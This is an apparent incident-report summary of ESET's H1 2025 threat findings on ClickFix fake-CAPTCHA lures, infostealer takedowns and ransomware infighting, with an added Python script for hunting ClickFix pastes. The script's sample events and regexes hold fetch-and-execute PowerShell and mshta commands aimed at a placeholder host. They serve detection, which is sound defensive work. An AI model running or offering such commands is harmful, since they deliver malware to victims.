Threat actors are embracing ClickFix, ransomware gangs are turning on each other – toppling even the leaders – and law enforcement is disrupting one infostealer after another
# Incident Report: Emergence of ClickFix, Infostealer Takedowns, and Ransomware Disputes (H1 2025)
## Executive Summary
The first half of 2025 saw significant shifts in the threat landscape: the rapid rise of the "ClickFix" social engineering technique, the disruption of several major infostealer operations by law enforcement, and open conflict ("deathmatch") among ransomware groups, with DragonForce attacking rival operations' leak sites. While established infostealer services were disrupted, ClickFix shows that a new social engineering tactic can reach mass scale within months.
## Incident Details
- **Discovery Date:** Not stated; the report covers activity observed in H1 2025.
- **Incident Date:** H1 2025 (January to June 2025)
- **Affected Organization:** Not specified; focused on generalized threat trends and specific malware families/groups.
- **Sector:** Broad impact across various sectors due to malware and ransomware prevalence.
- **Geography:** Not specified, implies global scale based on threat report nature.
## Timeline of Events
Since this is a threat report summary and not a specific organizational incident, the timeline reflects threat emergence and takedowns across the landscape:
### Initial Access
- **Date/Time:** ClickFix was practically non-existent a year earlier; by H1 2025 it had become the *second most prevalent attack vector* in ESET telemetry, behind only phishing.
- **Vector:** Social engineering via fake CAPTCHA pages (tracked by ESET under the **FakeCaptcha** detection name), which imitate a "verify you are human" check.
- **Details:** The lure page copies a command to the clipboard and instructs the victim to open the Run dialog (Win+R), paste, and press Enter to "complete verification". No software vulnerability is exploited; the victim runs the attacker's command with their own hands, which is why the technique bypasses browser exploit mitigations and download warnings.
### Lateral Movement
- Not individually detailed for a single incident, but implied as part of standard malware/ransomware operations discussed.
### Data Exfiltration/Impact
- **ClickFix:** The pasted command typically fetches and runs a second-stage payload (infostealers and other malware), leading to credential theft and further compromise.
- **Infostealers (e.g., LummaStealer, Danabot):** Theft of saved credentials, session cookies and other data from infected hosts, resold through malware-as-a-service models; these were the operations disrupted by law enforcement.
- **Ransomware:** Infighting between DragonForce and rival operations led to the defacement and takedown of rivals' data leak sites (DLS), including that of a then-leading group.
### Detection & Response
- **Detection:** ESET Research contributed technical analysis to the international operations against these infostealers.
- **Response actions taken:** Law-enforcement operations disrupted major infostealer services, including **Redline/Meta Stealer** (late 2024) and, in H1 2025, **LummaStealer** and **Danabot**.
## Attack Methodology
This section summarizes the techniques highlighted in the general threat environment of H1 2025:
- **Initial Access:** ClickFix (specifically FakeCaptcha social engineering).
- **Persistence:** Not detailed.
- **Privilege Escalation:** Not detailed.
- **Defense Evasion:** Not detailed.
- **Credential Access:** The core function of the disrupted infostealers (Redline, LummaStealer, Danabot), which harvest saved browser credentials, session cookies and similar secrets; also the usual follow-on of a successful ClickFix paste.
- **Discovery:** Not detailed.
- **Lateral Movement:** Not detailed.
- **Collection:** Data harvested by infostealer-as-a-service operations.
- **Exfiltration:** Data theft related to infostealer victims.
- **Impact:** Data compromise (infostealers); disruption of criminal infrastructure via DLS defacement/takedowns (ransomware infighting).
## Impact Assessment
- **Financial:** Not quantified, but disruption of infostealer-as-a-service operations negatively impacts cybercriminal revenue.
- **Data Breach:** High volume of credential and information theft historically associated with the disrupted infostealers.
- **Operational:** Disruption of criminal infrastructure (DLS takedowns).
- **Reputational:** Not applicable to victims, but demonstrated instability among ransomware actors.
## Indicators of Compromise
As this is a summary of general trends, the report excerpt provides no specific IOCs, only the categories of malware discussed:
- **Network indicators:** None provided for ClickFix infrastructure.
- **File indicators:** None provided; the families named are Redline/Meta Stealer, LummaStealer, Danabot and the DragonForce ransomware.
- **Behavioral indicators:** A command-line interpreter (powershell.exe, mshta.exe, cmd.exe) started by the desktop shell (parent explorer.exe, i.e. via the Run dialog) shortly after a browser visited a CAPTCHA-style page; the command typically hides its window, fetches a remote payload, and may carry an "I am not a robot" comment pasted along with it. The pasted text is also recorded in the user's RunMRU registry key.
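The behavioral indicator above and the Win+R paste flow described under Initial Access translate directly into a hunt. The following is an added example, not code from the ESET report or from ESET: it scores process-creation events shaped like Sysmon Event ID 1 (fields `ParentImage`, `Image`, `CommandLine`) and entries exported from the `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` key. The trait list, weights, threshold, and all sample events and registry values are constructed assumptions for illustration; `example.invalid` is a reserved placeholder, not a real indicator.

```python
"""Added example (not code from the ESET report): flag ClickFix-style command
execution in process-creation telemetry and in the Windows RunMRU key.

Assumptions (all hypothetical, for illustration):
- events are dicts with Sysmon Event ID 1 style fields ParentImage, Image,
  CommandLine; SAMPLE_EVENTS below is constructed, not real telemetry.
- RunMRU values are given as exported from
  HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU, where
  Windows stores each command with a trailing "\\1" and orders slots via MRUList.
"""
import re

# Interpreters and download helpers that pasted ClickFix commands typically invoke.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe",
           "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}

# The Run dialog (Win+R) belongs to the desktop shell, so whatever the victim
# pastes there starts with explorer.exe as parent. Lures that send the victim
# to a terminal instead would need this set widened.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Command-line traits common in ClickFix payloads: (name, weight, pattern).
TRAITS = [
    ("hidden_window", 1, re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)),
    ("encoded_command", 2, re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("policy_bypass", 1, re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)),
    ("remote_fetch", 2, re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|mshta)\b.*https?://", re.I)),
    ("inline_eval", 1, re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("captcha_lure", 2, re.compile(r"not a robot|captcha|verification", re.I)),  # lure text pasted with the command
]
THRESHOLD = 2  # one strong trait, or two weak ones, raises an alert (tune to your environment)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_traits(command_line: str) -> list[str]:
    """Names of the traits present in a command line, in TRAITS order."""
    return [name for name, _w, rx in TRAITS if rx.search(command_line)]


def clickfix_score(command_line: str) -> int:
    """Weighted sum of the traits present in a command line."""
    return sum(w for _name, w, rx in TRAITS if rx.search(command_line))


def is_clickfix_process(event: dict) -> bool:
    """True when the desktop shell launched an interpreter with a ClickFix-looking command line."""
    if basename(event.get("ParentImage", "")) not in INTERACTIVE_PARENTS:
        return False
    if basename(event.get("Image", "")) not in LOLBINS:
        return False
    return clickfix_score(event.get("CommandLine", "")) >= THRESHOLD


def scan_events(events: list[dict]) -> list[dict]:
    """Flagged events, each copied and annotated with its score and matched traits."""
    hits = []
    for ev in events:
        if is_clickfix_process(ev):
            cmd = ev.get("CommandLine", "")
            hits.append({**ev, "score": clickfix_score(cmd), "traits": suspicious_traits(cmd)})
    return hits


def parse_runmru(values: dict) -> list[str]:
    """Commands from an exported RunMRU key, most recent first (MRUList order), trailing '\\1' removed."""
    commands = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is None:
            continue
        commands.append(raw[:-2] if raw.endswith("\\1") else raw)
    return commands


def suspicious_runmru(values: dict) -> list[str]:
    """RunMRU entries whose command line scores like a ClickFix paste."""
    return [c for c in parse_runmru(values) if clickfix_score(c) >= THRESHOLD]


# Constructed sample telemetry; example.invalid is a reserved placeholder, not a real IOC.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},  # admin running a local script
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr -useb http://example.invalid/verify.txt | iex" '
                    '# \u2705 "I am not a robot - reCAPTCHA Verification ID: 7391"'},  # typical paste
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://example.invalid/check.hta"},  # mshta variant
    {"ParentImage": r"C:\Windows\System32\svchost.exe",  # scheduled task, not a user paste
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -w hidden -ep bypass -File C:\ops\maint.ps1"},
]

SAMPLE_RUNMRU = {  # constructed export of the RunMRU key
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w h -c "iwr http://example.invalid/fix.txt | iex" # I am not a robot\\1',
}

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(f"[process] score={hit['score']} traits={hit['traits']}: {hit['CommandLine']}")
    for cmd in suspicious_runmru(SAMPLE_RUNMRU):
        print(f"[RunMRU] {cmd}")
```

Run against the constructed samples, the two explorer.exe-spawned interpreters with a remote fetch are flagged and the scheduled-task PowerShell (hidden window plus policy bypass, but no interactive parent) is not; the RunMRU parser surfaces the same paste from the registry even when process telemetry was not collected. The parent-process filter is what keeps the rule quiet on administrative scripting; widen `INTERACTIVE_PARENTS` only if lures in your environment direct victims to a terminal rather than Win+R.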
## Response Actions
Response actions highlighted were largely driven by law enforcement and security researchers:
- **Containment measures:** Law enforcement coordinated takedowns of established malware services.
- **Eradication steps:** Infrastructure seizures and domain takedowns, with ESET Research support, removed the Redline, LummaStealer and Danabot services from the landscape. Operators of such services often attempt to rebuild, so the disruption should be treated as temporary until proven otherwise.
- **Recovery actions:** Not detailed for any specific victim organization.
## Lessons Learned
- **Key takeaways:** Social engineering methods like ClickFix can scale extremely rapidly, from negligible to the second most prevalent attack vector in under a year, because they require no exploit and pass through the victim's own hands. Infostealer-as-a-service operations concentrate enough criminal infrastructure to be worthwhile law-enforcement targets.
- **What could have been done better:** Greater organizational vigilance against social engineering that disguises code execution as a routine web interaction such as a CAPTCHA.
## Recommendations
- **Prevention measures for similar incidents:** No legitimate CAPTCHA or "verify you are human" check requires opening the Run dialog or a terminal and pasting a command; users should treat any such instruction as malicious. Where users have no business need for it, disable the Run dialog via the Explorer NoRun policy ("Remove Run menu from Start Menu"), restrict PowerShell for non-administrators, and alert on interpreters spawned by explorer.exe with hidden-window or download arguments. Security awareness training should cover these emerging social engineering tactics specifically.